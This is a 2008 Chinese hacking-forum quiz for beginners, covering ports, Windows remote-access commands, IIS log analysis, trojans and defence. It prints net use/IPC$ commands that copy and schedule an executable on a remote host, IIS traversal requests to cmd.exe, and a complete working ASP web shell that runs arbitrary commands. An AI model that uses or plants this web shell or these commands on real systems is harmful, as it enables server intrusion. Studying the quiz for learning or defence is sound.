菜鸟试卷

黑ㄨ狼 · 发表于 2008-1-16 19:46:10

http://192.168.0.1
http://xyz.3322.org
http://3232235521
三个连接指向同一目标网站，那么它们分别是什么意义？

二、
常用端口识别
20 21 23
25 80 110
139 443 445

三、
试述下列命令作用
c:\\>net use \\\\211.87.194.121\\ipc$ “123456”/user:”administrator”
c:\\>net use z: \\\\211.87.194.121\\c$
c:\\>net time \\\\211.87.194.121
c:\\>copy abc.exe \\\\211.87.194.121\\admin$\\system32

四、
试述下列命令的区别，如何防止该命令在本地或远程运行
c:\\>at \\\\211.87.194.121 21:05 abc.exe
c:\\>at 21:05 \\\\211.87.194.121\\admin$\\system32\\abc.exe

五、
W3SVC日志是什么？分析下面这段日志。
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /MSADC/root.exe /c+dir 403 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /c/winnt/system32/cmd.exe /c+dir 401 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /d/winnt/system32/cmd.exe /c+dir 401 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /HEAD 200 -

六、
netstat命令有何作用，举出两个参数进行说明。

七、
试述木马的一些基本特征。

八、
如何利用脚本实现对ftp的自动操作？

九、
下面是一个ASP木马，请找出支持这一程序的关键点。
<%@ Language=VBScript %>
<%

Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile

On Error Resume Next

Set oScript = Server.CreateObject(\"WSCRIPT.SHELL\")
Set oScriptNet = Server.CreateObject(\"WSCRIPT.NETWORK\")
Set oFileSys = Server.CreateObject(\"Scripting.FileSystemObject\")

szCMD = Request.Form(\".CMD\")
If (szCMD <> \"\") Then

szTempFile = \"C:\\\" & oFileSys.GetTempName( )
Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
<HTML>
<BODY>
<FORM action=\"<%= Request.ServerVariables(\"URL\") %>\" method=\"POST\">
<input type=text name=\".CMD\" size=45 value=\"<%= szCMD %>\">
<input type=submit value=\"Run\">
</FORM>
<PRE>
<%
If (IsObject(oFile)) Then
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</BODY>
</HTML>

十、
存在IIS或CGI漏洞，并对脚本有执行权限，如何进行入侵？
那么，如何在不打补丁的情况下避免这种攻击的发生？

十一、OSI模型中哪一层上有协议？分别是什么？

十二、观察ping命令的返回包的TTL值，可以了解到什么？

十三、从网关得到采样
目标 IP 192.168.0.1 端口80 源 IP　192.168.0.3 端口 3646
目标 IP 192.168.0.1 端口80 源 IP　192.168.0.3 端口 3647
目标 IP 192.168.0.1 端口69 源 IP　192.168.0.3 端口 69
请问这可能是什么样的会话，采用什么协议，进行什么样的作业？

十四、谈谈你对hacker和网络安全的认识

大家积极参与啊！！！

账号		自动登录	找回密码
密码			开放注册